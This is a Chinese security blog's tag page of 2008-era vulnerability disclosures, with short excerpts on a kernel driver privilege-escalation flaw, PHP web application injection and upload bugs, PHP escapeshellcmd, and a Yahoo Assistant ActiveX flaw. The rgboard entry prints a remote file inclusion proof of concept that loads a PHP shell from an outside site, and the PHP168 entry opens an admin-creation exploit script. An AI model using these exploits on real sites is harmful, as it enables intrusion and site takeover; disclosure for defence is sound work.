标签 ‘漏洞’ 下的日志

首页巡警v1.2及以下版本 本地权限提升漏洞(任意内核地址写入)

作者:MJ0011
来源:MJ0011的内核驱动研究所

首页巡警v1.2及以下所有版本的IRP_MJ_DEVICE_CONTROL处理例程存在 任意内核地址写入漏洞

该处理例程有两处地方都存在任意地址写入漏洞,其中一处可利用做本地权限提升,可在任意权限用户下执行,并写入任意数据到任意内核地址。

引发错误的原因是首页巡警的驱动开发者未能正确理解i/o传输方式导致的。首页巡警所有的数据传递都是通过MOTHOD_BUFFERED的io control code来执行的,根据MSDN中描述:
阅读全文 »

Tags: ,

F2blog XMLRPC 上传任意文件漏洞

By:Maple-x[B.C.T]
Site:http://www.neeao.com
Date:2008-5-27

刚从官方下载的最新版:F2blog-v1.2_build_03.01_full

存在漏洞文件:xmlrpc.php
阅读全文 »

Tags: ,

首页巡警v1.1/1.0 内核驱动 拒绝服务 及 本地提权漏洞

作者:MJ0011
来源:MJ0011的内核驱动研究所

首页巡警v1.1/1.0的内核驱动程序存在严重漏洞

安装了首页巡警v1.1(v1.0)的机器,任意权限的用户可导致系统蓝屏(BSOD),造成拒绝服务攻击

结合我之前公布的SystemCrashDumpInformation加载驱动方式,可以在安装了HIPS的机器上造成本地提权漏洞,即任意权限的用户可以加载驱动到内核并执行。
阅读全文 »

Tags: ,

PHP168 X-Forwarded-For的漏洞利用

作者:amxku
来源:amxku’s blog

漏洞本身的成因没什么好说的,老掉牙的x-forwarded-for的问题,我想这个漏洞很多人都找到了。
因为这个漏洞也有些时间了,当时只是在pc上测试了一下,可能有些错误,有兴趣的同学可以自己研究一下。

<?php
print_r("
+------------------------------------------------------------------+
Create New Admin Exploit For php168 v4.0SP\n
amxku.net
+------------------------------------------------------------------+
 阅读全文 »
Tags: , ,

Dedecms getip()的漏洞利用

author: superhei
team:http://www.ph4nt0m.org
blog:http://superhei.blogbus.com

flyh4t在非安全发布了dedecms getip()的注射漏洞,漏洞本身的成因没什么好说的老掉牙的X-Forwarded-For的问题,我想这个漏洞很多人都找到了,不过这个漏洞的利用有个地方还是可以说说的,可以直接得到shell:

在用户登陆后把用户信息写如了缓存:\include\inc_memberlogin.php
阅读全文 »

Tags: , ,

php escapeshellcmd多字节编码漏洞解析及延伸

作者:T_Torchidy (jnchaha_at_163.com)
来源:安全焦点

漏洞公告在http://www.sektioneins.de/advisories/SE-2008-03.txt

PHP 5 <= 5.2.5
PHP 4 <= 4.4.8

一些允许如GBK,EUC-KR, SJIS等宽字节字符集的系统都可能受此影响,影响还是非常大的,国内的虚拟主机应该是通杀的,在测试完这个漏洞之后,发现还是十分有意思的,以前也有过 对这种类型安全漏洞的研究,于是就把相关的漏洞解释和一些自己的想法都写出来,也希望国内的一些有漏洞的平台能迅速做出响应,修补漏洞。
这个漏洞出在php的用来转义命令行字符串的函数上,这些函数底层是用的php_escape_shell_cmd这个函数的,我们先来看看他的处理过程:
阅读全文 »

Tags: ,

rgboard 3.0.12 远程文件包含漏洞

鬼仔:昨天有事出去了下,家里宽带到期了,我竟然不知道,晚上回来之后才发现的,今天去交了费,所以更新没跟上。

Infos: rgboard 3.0.12 远程文件包含漏洞
Author: Flyh4t[w.s.t]

rgboard 3.0.12 是韩国的一个论坛程序,可以用google搜索rgboard查看使用的网站
vul code:
\include\bbs.lib.inc.php:
if (!defined(‘BBS_LIB_INC_INCLUDED’)) {
define(‘BBS_LIB_INC_INCLUDED’, 1);
// *– BBS_LIB_INC_INCLUDED START –*
if(!$site_path) $site_path=’./’;
require_once “{$site_path}include/lib.inc.php”;
//$site_path没有过滤直接放过来包含了
poc:
在你的网站放个phpshell,目录和文件名为/include/lib.inc.php
然后访问
httP://www.target.com/include/bbs.lib.inc.php?site_path=http://yousite/

Tags: , , ,

Yahoo! 助手(3721) ActiveX远程代码执行漏洞

来源:

发现者: Sowhat of Nevis Labs
日期: 2008.05.06

http://hi.baidu.com/secway/blog/item/d9b45dddf0603bdc8d1029a9.html
http://secway.org/advisory/AD20080506EN.txt
http://secway.org/advisory/AD20080506CN.txt

CVE:    N/A

厂商
Yahoo! CN

受影响版本:
Yahoo! Assistant<=3.6 (04/23/2008之前版本)
阅读全文 »

Tags: , ,